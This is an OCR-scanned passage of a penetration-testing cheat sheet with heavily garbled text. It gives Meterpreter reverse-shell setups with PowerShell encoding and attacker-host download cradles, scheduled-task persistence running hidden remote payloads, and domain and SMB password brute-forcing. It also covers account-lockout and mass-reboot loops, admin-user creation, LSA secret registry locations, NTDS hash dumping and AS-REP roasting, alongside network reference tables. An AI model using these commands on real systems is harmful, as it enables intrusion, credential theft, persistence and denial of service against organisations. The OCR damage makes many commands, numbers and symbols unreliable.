4. powershell.exe -executionpolicy bypass encodeMeterpreter. pst 5. Copy the encoded Meterpreter string Start the listener in the attacking system 1. ./msfeonsole 2. use exploit/multi/handler 3. set payload windows/meterpreter/reverse https 4, set LHOST 1. 1, 1. 1 5. set LPORT 443, 6. exploit -j On the target system (run powershell(x86)) 1. powershell. exe -noexi t -encodedCommand paste encoded Meterpreter string here PROFIT Encodemeterpreter.ps1 [7] # Get Contents of Script Suuntents = Get-Content audit. pst # Compress Script $ns = New-Object 10.MemoryStrean $action = [10.Conpression.ConpressionMode]: :Compress $c5 =New-Object 10.Conpression.DeflateStream (Sms, $action) $sw =New-Object 10.StreamWriter (Scs, [Text.Encoding] ::ASCII) Scontents I ForEach-Object {$sw.WriteLine($ I) ssw.Close() # Baseb4 Encode Stream Scode= [Convert]: :ToBase64str ing( sms. ToArray()) Sconmand= "Invoke-Expression '$(New-Object I0.StreanReader('$(New-Obiect 10, Compression. DeflateStream ('$(New-Object I0, t4emoryStrean (G'S ( [Convert] : : FromBase64String (*"$code'") ) II, [10. Compression. Compressiont~ode]: :Decompress) I, [Text Encoding sCII)) -ReadToEnd() ; # Lnvoke-Expression $command Sbytes= [System.Text. Encoding] code. GetBytes ( $command)SencodedConmand = [Convert]: :ToBase64String($bytes) # Write to Standard out Write-Host $encodedConmand Copyright 2012 TrustedSec, LLC. Alll rights reserved. Please see reference [7] for disclaimer Using powershell to start meterpreter (second method) On bt attack box 1, msfpayload windows/rneterpreter/reverse tcp LHOST=10.1.1.1 LPORT~8@8@ R I msfencode -t psh -a x86 in the attacking system 1, c:\powershell 2, PS c:\ Scmd = ‘PASTE THE CONTENTS OF THE PSH SCRIPT HERE* 3. PS ct\ Su = [System.Text.Encoding]: :Unicode.GetBytes($crnd) 4, PS cz \ Se = [Convert] ::ToBase64String( Su) 5. PS cz\ Se 6. Copy contents of se Start the listener in the attacking system -/ms fconsole use exploit/multi/handler - Set payload windows/meter preter /reverse top - set LHOST 1.1.1.1 set LPORT 8080 exploit -j In the target system (1: download the shell code, 2: execute) \ powershell -noprofile -noninteracti ve command " & {ScLient=new-object System.Net.WebCLicnt; $c Lient Down loadFile( ‘http: //1.1.1.1/shelL txt + ‘C#\windows\temp\shell.txt*) )* \ powershell nuprufile noninteractive next t command" & {Scrnd-t}pe *cz\winduws\temp\shelL. txt! ;powersheLl nuprofilenoninteractive~noexit -encodedCornmand $cmd} PROFIT Identification of vulnerable domains with powerup https: //github. com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp. ps1 + +\PowerUp.ps1 Windows registry operating system information HKLM\Software\Microsoft\Windows NT\CurrentVersion Product Name HKLM\Software\Microsoft\Windows NT\CurrentVersion /v ProductNarne Installation Date HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate registered name HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner System boot information HKLM\Software\~icrosoft\Windows NT\CurrentVersion /v SystemRoot Time zone information (in minutes from UTC) HKLM\System\CurrentControtset\Control\TimeZoneinformation /v ActiveTirneBiasMap of network drivers HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive RU Mounted devices HKLM\System\MountedDevices usb devices HKLM\ System\CurrentControlset\Enurn\usBstor Activation of IP forwarding HKEY_LOCAL_~ACHI~E\SYSTEM\CurrentControlset\Services\Tcpip\Parameters — IPEnableRouter = 1 Password keys: LSA secret cat certain vpn, autologon, other passwords HKEY LOCAL MACHINE\Security\PoLicy\Secrets HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\autoadminlogon Audit policy information HKLM\Security\Policy\PolAdTev Kernel and user services HKLM\Software\Microsoft\Windows NT\CurrentControlset\services software installed in the system HKLM\ SoftwareInstalled software for the user HKCU\Software Latest documents HKCU\Software\Microsoft Windows \CurrentVersion\Explorer\RecentDocs The last positions of the user HKCU\Software\Microsoft\Windows \CurrentVersion\Explorer\ComD1g32\LastVisite dtmu & \Opensavetmu URLs typed HKCU\Software\Microsoft\Internet Explorer\TypedURLs MRU lists HKCU\Software\Microsoft\Windows \CurrentVersion\Explorer\Runl™RU, The last registry key used HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegEdit /v LastkeY Launch paths HKLM\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce HKLM\SOFTWARE\Micr usuft Windows \Cur rentVersion\PuLicies\Explorer\Run HKCU\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce HKCU\Software\Micrusuft\Windows NT\CurrentVersivn\Windows\Load & \Run Activation of Remote DesktopSet-ItemProperty -Path ‘HKU! System\CurrentControlset\Control\Terminal Server! -name "fC Get Windows information with dsquery List of domain users dsquery user -limit @ List of domain groups domain=victim.com dsquery group “cn=users, dc=victim, dc=com" List of domain administrators dsquery group -name "domain admins" | dsget group -nembers -expand List of user groups dsquery user -name bob | dsget user -menberof -expand Get the entered user id dsquery user -name bob | dsget user -samid List of users who have not been active in the last two weeks dsquery user ~ inactive 2 Add user dsadd user “CN=Bob, CN=Users,DC=victim, DC=con" said bob pwd bobpassdisplaj "Bob" -pwdneverexpires yes -menberof "CN=Domain‘Admins, CN=Users ,DC=victim,DC=com Delete user dsrm —subtree -noprornpt. "CN=Bob, CN=Users ,DC=victim, D( List of domain operating systems dsquery A “DC=victim,DC=com" ~scope subtree -attr en’ “operat ingSystemServicePack" —filter (& (objectclass=computer) (objectcategory=computer) (operatingSystem=Windows} » ‘operat ingSystem" List of site names dsquery site -o rdn -limit 0 List of all subnets in the site dsquery subnet -site sitename -o rdn List of services in the site doquery server -site sitename -or rdn Get domain servers dsquery ‘ domainroot —filter " (& (ubjectCateyory=Computer) (ubjectClass=Computer) (operatingSysten= "Server! )) "amit @ DC list of the site dsquery "CN=Sites, CN=Configuration,DC=forestRootDomain" filter (objectCategory=Server)Script writing Bash script variables must be placed in the form %% For example %%i Create ping sweep for /L %i in (10,1,254) do@ (for /L %x in (10,1,254) do@ ping -n 1 -w 100 10,10.%i.%x 2 nul 1 find “Reply” && echo 10,10.%i.%% Live. txt) Create a loop inside the file for /F %i in (file) do command domain brute forcer operation for /F % in (names.txt) do for /F %pin fuser: domain \%n %p 1 NUL 2 61 && echo \\DCOLVIPCS NUL account closing(lockout.bat) @echo Test run: for /f %W in (List.txt) do @for /1 9c 1234\cS_/USER:*U wrong pass DHCP exhaustion operation for /L i L118 in (2,1,254) do (netsh interface ip set netrask gw ID “1 ping 127.0.0.1 -n lw DNS reverse lookup process for /L %i in (108, 1, 105) dns.txt && echo Server: (pawds.txt) do net use \\DCe1\IPC$ sen:%p S& net use /delete in (1,1,5) do @echo net use \\WIN- address local static 10000 nul %1)do @ nslookup 1.1.1.%i I findstr /i /c: L114 dns. txt Name! Search all the paths to find the files that contain PASS and display the details of that file forfiles /P c:\temp /s /m pass -c “cmd /c echo @isdir @fdate @ftime Grelpath @path @fsize" Malicious domain simulation (Application for IDS test) # Run packet capture on attack domain to receive callout # domains.txt should contain known malicious domains for /L %i in (0,1,100) do (for /F %n in (domains.txt) do nslookup %n attack domain NUL 2 81 & ping -n 5 127.0.0.1 NUL 2 &1 Operation of IE web looper (traffic generator) for /L %C in (1,1,5000) do @for SU in (ww. yahoo.com yow.pastebin. com wwow.paypal.com wwu.craigslist.org www.google.com) do start /b iexplore AU & ping -1 6 localhost & taskkill /F /IM iexplore.exe Get access to executive services for /f “tokens=2 delims='='" %a in (‘wmic service list full | find /i “pathname” I find /i /v "system32"') do @echo %a c:\windows\temp\3afdaga. tmp for /f eol =" delins =" %a in (c:\windows\temp\3afdaga.tmp) do cmd.exe Jc icacts Spinning Reboot (replace /R with /S to shutdown): for /L %i in (2,1,254) do shutdown /r /m \\1.1.1.%i /f /t @ /c "Reboot message” Create a shell using vbs (requires identity information)# Create .vbs script with the following Set shell wscript. createobject("wscript.shell") Shell.run “runas /user: user" & """" & C:\Windows\Systen32\WindowsPowershell\v1.O\powershell.exe -WindowStyle hidden NoLogo -Noninteractive -ep bjpass -nop -c \" & ""™" & “TEX ((New- Object Net.WEbClieil':).downloadstring(* url '))\" & wscript.sleep(100) shelL.Sendkeys “password” & "{ENTER}" 6 Scheduling the task Scheduled tasks binary paths CANNOT contain spaces because everything after the first space in the path is considered to be a command-line argument. Enclose the /TR path parameter between backslash (\) AND quotation marks ("): see /TR "\"C:\Program Files\file.exe’ -x arg" Scheduling the task (ST=start time, SD=start date, ED=end date) *need admin access SCHTASKS /CREATE /TN Task Name /SC HOURLY /ST HH:MM /F /RL HIGHEST /SO MM/DD/YYYY /ED MM/DD/YYYY /tr "C:\my.exe" /RU DOMAIN/user /RP password Always schedule task [10] For 64 bit use: "C3 \ilindows)\syswow6d \WinduwsPower She LL\vL.O\power she ULexe™ # (x86) on User Login SCHTASKS /CREATE /TN Task Name /TR "C: \nlindows\System32\WindowsPowerSheL\vL.O\powersheLl.exe -WindowStyle hidden -NoLogo -Noninteractive -ep bypass nap -c ‘IEX ((new-object net.webcLient) .downluadstring( "*http:// ip : port I payload’ **))** /SC onlogon /RU System # (x86) on System Start SCHTASKS /CREATE /TN Task Name /TR "C:\Windows \System32\WindowsPowerShell\v1.0\powersheLl.exe -WindowStyle hidden -NoLoyy -Noninteractive -ep bypass nap —¢ TEX ((new-object het.webcLient) .downluadstring("http:// ip : port I payload))" /SC onstart /RU System # (x86) on User Idle (30 Minutes) SCHTASKS /CREATE /TN Task Name /TR\Windows\System32\WindowsPowerShell\v1.0\powersheLl.exe -WindowStyle hidden -NoLogo -Noninteractive -ep bjpass -nop ~c 'IEX ((new-object net.webclient) .downloadstring("http:// ip : port I paytoad))'™ /SC onidle /i 30 Instructions for working with smb Log in with a specific user smbcLient -L 10.10.10.10 -U tlevel Login without password smbcLient NL 10.10.10.10 Change password smbpasswd -r 10.10.10.19 -U tlevel Show shared route smbeLient -L 10. 10.10.10 Show the specified route smbcLient //10.10.10.10/forensic Login to Shell smbcLient //10.1.10.18/profiless Get users along with password hash python3 /usr/share/doc/python3~impacket/examples/GetNPUsers.py 10.10.18. 10L usersfileGuess different smb passwords with metasploit msf5 > use auxiliary/scanner/smb/smb_login set pass_file wordlist set USER_file users. txt set RHOSTS 10.10.10.10 with medusa medusa -h 10.10.10.10 -U users.txt -P wordlist -M snbnt rpcclient commands entering the system rpcclient 10.10.10.10 -U support Show user information queryuser support Show users enundomusers Show permissions enumprivs Change user access setuserinfo2 auditzez0 23 ‘redtea’Show printers enumprinters NTLM extraction from ntds.dit file python3 /usr/share/doc/python3~impacket/examples/secretsdump.py -ntds ntds.dit -system sy hashes \mhash:nthash LOCAL -output nt-hash Gather information using SharpHound https: //github. com/BloodHoundAD/B1oodHound/blob/master/CoLectors/SharpHound. exe +\SharpHound exe SharpHound.exe -c All —-zipfilename output. zip Gather information about Sql Server https: //github. com/NetSPI/PowerUpSQL/blob/master /PowerUpSQL. ps1 + +\PowerUpSQL.ps1 Get-SQLInstanceDomain | Get-SQLServerInfo —Verbose Obtain AS-REP Roast hash https: //github. com/r3motecontrol/Ghostpack-Compi ledBinaries + \Rubeus.exe asreproast List of available ips without using nmap for /L i in (1,1,255) do @ping -n 1 -w 200 10.10.10.%i > nul & echo 10.10.10.%i is up. Orhttps: //github.com/sperner/PowerShell/blob/master/PortScan.ps1 +\PortScan. ps1 -\PortScan.ps1 10.10.10.16 1 10000 Service identification with Test-WSMan PS> Test-WSMan ~ComputerName -Port 6666 Enumerate OU’s Get ~ NetOU - verbose Retrieve users in ‘ICS’ OU Get ~ DomainUser - Searchiase "LDAP://OU = ICS,DC = nuclear, DC = site" ~ Verbose SharpHound Collect SharpHound.exe --CollectionMethod alt Impersonate Token of nuclear\vdadmin (on psexec session) Incognito. exe Ust_tokens ~ Incognito. exe execute ~ ¢ NUCLEAR\ udadmin" C:\Users\Publie\ binary. exe Network Common ports [No Service | :--- |:--- || 21| FTP | 22 | SSH | 23 Tel net | | 25 | SMTP | 49 | TACACS | | 53 DNS | | 8/67 DHCP (UDP) || 69 TFTP (UDP) || 80 | HTTP | | 88 Kerberos | 110 | POPS | 111 RPC || 123 NTP (UDP) | |135 | Windows RPC || 137 NetBIOS || 138 | NetBIOS | | 139 | SMB | | 143 IMAP || 161 SNMP (UDP) | | 179 | BGP || 201 Apple Talk || 389 LDAP || 443 HTTPS | 445 | SMB | | 500 | ISAKMP (UDP) | | 514 ‘Syslog | | 520 | R.LP | 7/546 DHCPvé6 | | 587 SMTP | 902 VMware | | 1080 | Socks Proxy | |1194 | VPN || 1433/4 MS-SQL | | 1521 | Oracle || 1629 | DarneWare || 2049 | NFS | | 3128 | Squid Proxy | | 3306 | MySQL || 3389 | RDP | 5060 | SIP || 5222 | Jabber | | 5432 | Postgres | 5666 | Nagios | | 5900 | VNC | 6000 | X11 | | 6129 | DameWare || 6667 | IRC | | 9001 | Tor || 9001 | HSQL | | 9090/1 Open fire | 9100 | Jet Direct | Get operating system information with TTL os size Windows 128 Linux 64 255 Solaris 255 ftp status codes situation code Waiting for user login 220 Not authenticated 530 http status codes situation code Successful connection 200 Lack of access 403 IPV4 information Classful rangename start end A000.0 127.255.255.255 B128.0.0.0 191.255.255.255 c 192.0.0.0 223.255.255.255 D224.0.0.0 239.255.255.255 E 240.0.0.0 256.255.255.255 Range Reversed start end 10.0.0.0 10.255.255.255 1270.0.0 127.255.255.255 172.16.0.0 — 172.31.255.255 192.168.0.0 192.168.255.255 Subnetting [31 26.255.26.254 Host [30 255.255.255.252 2Hosts [29 255.255.255.248 6 Hosts [28 255.255.255.240 14 Hosts. 127 255.255.255.224 30 Hosts. [26 255.255.255.192 62 Hosts. [25 255.255.255.128 126 Hosts. [24 255.255.255.0 254 Hosts [23 255.255.2540 510 Hosts. [22 285.255.2520 1022 Hosts [21 255.255.248.0 2046 Hosts.[20 ns ne 7 ne ns na ne n2 m no 19 1B 255.255.240.0 255.255.224.0 255.255.192.0 255.255.128.0 255.255.0.0 255,254.00 255.252.0.0 255.248.0.0 255.240.0.0 255.224.0.0 255.192.0.0 256.128.0.0 255.0.0.0 4096 Hosts 8190 Hosts 16382 Hosts 32766 Hosts 65534 Hosts 131070 Hosts 262142 Hosts 524286 Hosts 1048574 Hosts 2097150 Host 4194302 Host 8388606 Host 16777214 Hosts Calculate the subnet range Given 28 = 256 1 Range IPV6 information Broadcast addresses 0; ff05: ffo 1.1.1.101/28 255.255.255.240 netmask 240 - 16 ~ subnet ranges of 16, ive. -1.1.0 a 1. 1.1.16 1.1.32 0 where given IP falls: 1.1.1.96 ~ 1.1.1.111 1 Unk local nodes. 1 ~ site-local nodes 2 ~ node-local routersf02::2 - link-local routers ff05::2 - site-local routers Interface addresses e80:: ~Link-local 2001:: - routable a.b.c.d- IPv4 compatible IPv6 ffffza.b.c.d- IPv4 mapped IPv6 ipv6 toolbox Remote Network DoS: rsumrf6 eth# remote ipve port forward with chisel s/chisel server -p 9000 —-reverse s/chisel client Or -/chisel server -p 9000 --reverse «/chisel client :9000 R:socks v6 tunnel in ipv4 with socat socat TCP-LISTEN: 8080, reuseaddr, fork TCP6: (2001: -/nikto.pl host 12-.0.0.1 -port 8¢80 Cisco commands Command Description enable Enable privilege mode #configure terminal interface settings